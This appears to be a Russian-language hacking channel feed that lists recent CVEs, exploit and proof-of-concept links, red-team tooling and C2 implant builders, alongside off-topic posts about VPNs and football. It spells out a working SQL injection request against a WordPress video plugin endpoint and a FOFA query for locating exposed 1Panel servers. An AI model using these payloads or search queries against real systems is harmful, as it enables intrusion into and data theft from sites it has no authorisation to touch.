CVE-2024-39202 D-Link DIR-823X
*
RCE
*
writeup
*
POC exploit

По поводу youtube
*
Пошел проверять, 4К прекрасно гоняется без тормозов.
Я и не сразу то понял почему 👌
Ну если по офф версии на территории РФ стоит старое оборудование google
которое не обновляется, а трафф вырос.
Что мешает обходиться это узкое место ?
Ответ: ничего.
Поставьте себе vpn (только не быдло wireguard и даже не православный openvpn, а что то современное, типа xtls). клиенты есть под любую платформу: unix/linux/windows/android/apple
И будет вам счастье.
Бонус трэк: конспирологическая версия
Подумалось, тут же наши выкатили аналог тытрубы - "Платформа", но нас уже палкой от youtube отгонишь, вот и зарезали траффик )))

Exploiting Enterprise Backup Software For Privilege Escalation
*
часть первая
часть вторая
*

#LPE #interprise #research

Просыпаемся, завтракаем
*
CVE-2024-5522 WordPress HTML5 Video Player SQLi
*
usage:

GET  /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -

CVE-2024-34102
*
Adobe Commerce
Версии: 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8
XXE vuln
*
Exploit

pdf exploit
*
Создать свой

#CVE-2024-4367 #pdf

CVE-2024-29824
*
Ivanti EPM - Remote Code Execution
*
Mass exploit

Viva España
2:1
Прекрасный матч !!!

CVE-2024-41003
*
Linux Kernel: Vulnerability in the eBPF verifier register limit tracking

#kernel

IHxExec
*
POC для выполнения произвольного кода от имени другого пользователя
*
download

ThinkPad Hardware hacking to bypass BIOS passwords
*
Read

#hardware #bios

Havoc C2 Teamserver SSRF exploit
*
Exploit

#CC #C2 #havoc #hackBYhack

берегите котиков
*
#bilet

CVE-2024-40348
*
Bazaar < v1.4.3 обход каталога
*
POC+scanner
*

Meta LLaMA 3.1 Нейроночка
*
764GiB после распаковки~820GB

magnet:?xt=urn:btih:c0e342ae5677582f92c52d8019cc32e1f86f1d83&dn=miqu-2&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80

*

СVE-2024-39907
CVSS 9.8
Ошибка SQLi подвергает пользователей 1Panel удаленному захвату
*
POC exploit
*
FOFA Query: icon_hash="1300107149" || icon_hash="1453309674" || http://cert.issuer.cn="1Panel Intermediate CA"

FOFA Link: пыщь

#1panel #china

CVE-2024-41107
*
Apache CloudStack
*
Версии с 4.5.0 по 4.18.2.1 и с 4.19.0.0 по 4.19.0.2.
*
Дырка в механизме аутентификации SAML
*
Для админов\white: saml2.enabled заменить на saml2.false бгг))

#apache #saml

PumpBin
*
Собирайте offensive имплатны, шаблоны, подгружайте в свои C2\C&C
Но помните, ровно в полночь - дадут бинарём в тыкву
*
Скачать тут
*
Документация тут

🎃

Linux Shellcoding
*
Избегайте нулевых байтов \\x00 в шеллкодесах !!!
*
Щелкнуть орешек знаний тут

#linux #redteam

Плащ невидимка для linux процессов
*
В программе:
Аномальное монтирование
Пустые каталоги в которых есть жизнь
Заплывы с sTrace
Форензика одной ладошкой
*
Я надеваю свой плащ и волшебную шляпу - Invisibility Cloak - Slash-Proc Magic

#redteam #linux #proc

Поздравляем с днем системного администратора 2024
*
и смотрим классику 😏

#sysadminDAY